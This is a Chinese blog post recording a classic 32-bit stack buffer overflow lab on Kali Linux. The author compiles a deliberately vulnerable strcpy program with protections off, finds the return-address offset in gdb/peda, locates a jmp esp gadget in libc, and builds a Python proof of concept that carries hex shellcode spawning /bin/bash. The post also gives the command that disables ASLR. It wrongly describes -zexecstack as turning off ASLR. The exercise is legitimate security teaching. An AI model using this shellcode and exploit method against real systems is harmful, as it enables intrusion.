kali下栈溢出实验和一些tips

版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/niexinming/article/details/76893510

首先我的实验环境和教程均来自http://staff.ustc.edu.cn/~sycheng/ssat/,我这里讲的是《栈溢出 & 整数溢出》这个课程的实验

实验开始,首先你要准备好环境,我的操作系统是kali-linux-2017.1-i386

然后你要安装Linux下pwn都会用到的工具:peda,安装方法是:

git clone https://github.com/longld/peda.git ~/peda
echo "source ~/peda/peda.py" >> ~/.gdbinit

实验代码是:

#include <stdio.h>
#include <string.h>

void SayHello(char* name)
{
    char tmpName[60];

    // buffer overflow
    strcpy(tmpName, name);

    printf("Hello %s\n", tmpName);
}

int main(int argc, char** argv)
{
    if (argc != 2) {
        printf("Usage: hello <name>.\n");
        return 1;
    }

    SayHello(argv[1]);
    return 0;
}

因为编译器默认会开启,栈数据保护和aslr,所以编译的时候要关闭

将以上代码保存为1.cpp,然后g++ 1.cpp -g -o testlinux -zexecstack -fno-stack-protector

其中-g指令是让编译后的二进制文件启用调试,-zexecstack是关闭aslr,-fno-stack-protector关闭栈保护

然后用gdb调试testlinux

在gdb里面用r `python -c 'print "a"*100'`这样的指令传入100个a作为参数

然后发现我们的程序崩溃了,eip指向了0x61616161这个地方,也就是说我们这个程序缓冲区溢出了

我们在gdb中用b 9和b 21在代码处的第9行和第21行下断点

我们这个时候要知道函数栈的结构

---->栈内存由低向高方向----->
|------------栈变量----------|----ebp----|------返回地址------|函数形参|

现在我们继续在gdb里面用r `python -c 'print "a"*100'`

发现程序停在了这里

这里停在了源代码的第9行,如果按n的话就是单步执行到源代码的下一行,我想执行汇编代码的下一行要按ni,要在源代码中进入到某个函数要输入s,但是要在汇编代码中进入到某个call就输入si

我单步ni走到call的地方

然后输入si进入到这个函数中去,因为call指令相当于push eip;jmp 函数地址

进入到这个函数地址之后我们记录一下esp的地址0xbffff5bc,这个地址是函数的返回地址


然后继续按n,走到strcpy处,然后一直输入ni直到call完strcpy这个函数

然后我在gdb里面用x/44xw tmpName查看tmpName的变量内容

此时我发现0xbffff5bc这个地方也被0x61616161给覆盖了,然后继续运行,很自然eip就变成了0x61616161

现在我计算一下,tmpName到函数返回地址的距离,0xbffff5bc-bffff574=0x48

十六进制的48转换成十进制为72

先在我们找一个可以用的shellcode

shellcode 可以用zsc,介绍文章在http://www.freebuf.com/sectool/95250.html

用zsc最新版生成shellcode的过程与官网介绍的文档有点不同,但是也可以用zsc -e来获取一些生成shellcode的例子

我用zsc -p linux_x86/exec/none -i "/bin/bash" -o shellcode.c

来生成一个shellcode

现在炮弹有了,我们需要一个跳板来发射,一般找的跳板是jmp esp或者call esp,这时我们用到peda一个很方便的功能,asmsearch

我在libc找一个jmp esp,命令是 asmsearch "jmp esp" libc

现在找到一个地址:


0xb7c13ab1 这个地址就是我们要找的跳板

如果我们把内存布局成

---->栈内存由低向高方向----->
|------------aaaa(72个a)|被覆盖的返回地址|shellcode|

现在我用py写一个poc

shellcode="\xb0\x46\x31\xdb\x31\xc9\xcd\x80\x68\x90\x90\x90\x68\x5b\xc1\xeb\x10\xc1\xeb\x08\x53\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc0\xb0\x0b\xcd\x80\xb0\x01\xb3\x01\xcd\x80"
input="a"*72
jmpesp="\xb7\xc1\x3a\xb1"[::-1]
re=input+jmpesp+shellcode
print re

为啥jmp esp的地址要反转呢,因为x86的内存是小端字节序,但是gdb显示的时候是从高地址读到地址的,所以要把jmpesp的地址做一次反转

然后我们把断点再设置在b 12处,r 传入的参数为`python test.py`

这时运行正好断在了SayHello的结尾处

我们ni继续运行,到ret的地方之后(ret相当于 pop eip)

eip指向了我想的地址(jmp esp),而esp则指向了shellcode的地方

继续ni执行

发现执行到我的shellcode地方

继续执行就可以成功执行/bin/bash了

但是如果离开gdb在shell执行的话就会报:段错误

这个时候我们应该关闭系统的aslr

debian系统关闭aslr的指令为

echo 0 >/proc/sys/kernel/randomize_va_space

然后就可以顺利成功了


没有更多推荐了,返回首页